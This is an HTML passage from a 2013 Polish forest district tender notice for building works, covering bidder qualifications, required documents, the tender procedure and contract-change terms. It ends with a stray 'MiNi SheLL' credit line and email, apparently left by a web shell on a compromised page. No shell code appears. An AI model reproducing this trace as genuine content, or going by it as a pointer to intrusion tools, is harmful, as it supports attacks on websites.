<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane  (potwierdzone dokumentami, że roboty zostały wykonane  należycie i zgodnie z zasadami sztuki budowlanej oraz  prawidłowo ukończone) polegające na wykonaniu robót  budowlanych o podobnym charakterze i wartości nie mniejszej niż: 
- 300 000,00 złotych netto każda robota.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że osoby, którymi dysponuje do realizacji zamówienia, posiadają odpowiednie kwalifikacje zawodowe, doświadczenie  i wykształcenie - warunek minimalny: 
- posiadanie przez kierownika budowy uprawnień budowlanych do kierowania robotami budowlanymi o specjalności ogólnobudowlanej 
- posiadanie przez kierownika robót uprawnień branży  hydraulicznej i klimatyzacyjnej
- posiadanie przez kierownika robót uprawnień branży elektrycznej. 
Poświadczone kopie uprawnień osób, które będą uczestniczyć w wykonaniu zamówienia, Wykonawca przedłoży Zamawiającemu po wyborze oferty najkorzystniejszej, przed podpisaniem umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a także nie podlegają wykluczeniu z postępowania 
o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).  
1.Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże posiadanie opłaconej polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum  300 000,00 zł   
2.Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, wynikać będzie, że wykonawca posiada środki w wysokości: 
- nie mniejszej niż 400 000,00 zł lub, że posiada zdolność kredytową na kwotę nie mniejszą 
niż 400 000,00 zł.  
Wykonawca, który z uzasadnionej przyczyny nie może przedstawić dokumentu wymienionego 
w pkt. 6.2.4, a dotyczącego sytuacji finansowej i ekonomicznej, może przedstawić inny dokument, który w sposób wystarczający potwierdzać będzie spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy wypełniony i podpisany przez Wykonawcę
2. kosztorys ofertowy sporządzony metodą szczegółową na podstawie przedmiaru robót</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość zmian następujących postanowień zawartej umowy w stosunku do treści oferty wykonawcy: 
a. przedłużenie terminu realizacji przedmiotu umowy- w przypadku, gdy na skutek 
działania siły wyższej lub innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy wykonanie prac stanowiących przedmiot zamówienia nie będzie możliwe w terminach zgodnych z wiedzą i praktyką budowlaną w okresie obowiązywania umowy. 
b. zmiana wysokości wynagrodzenia, jeżeli w okresie obowiązywania umowy nastąpi 
zmiana stawki podatku od towarów i usług (VAT)- od chwili zmiany podatek w nowej 
stawce będzie doliczany do cen netto zawartych w formularzu cenowym z oferty 
Wykonawcy. Należny podatek VAT naliczony zostanie do ceny netto na fakturze zgodnie z obowiązującym prawem w dniu wystawienia faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_przymuszewo/zamowienia _publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Przymuszewo, Przymuszewo 3, 89-634 Leśno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w kasie Nadleśnictwa (pokój nr 6). Otwarcie ofert nastąpi w dniu: 29.11.2013 r. godz. 10:15 w siedzibie Zamawiającego (pok. nr 15 I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com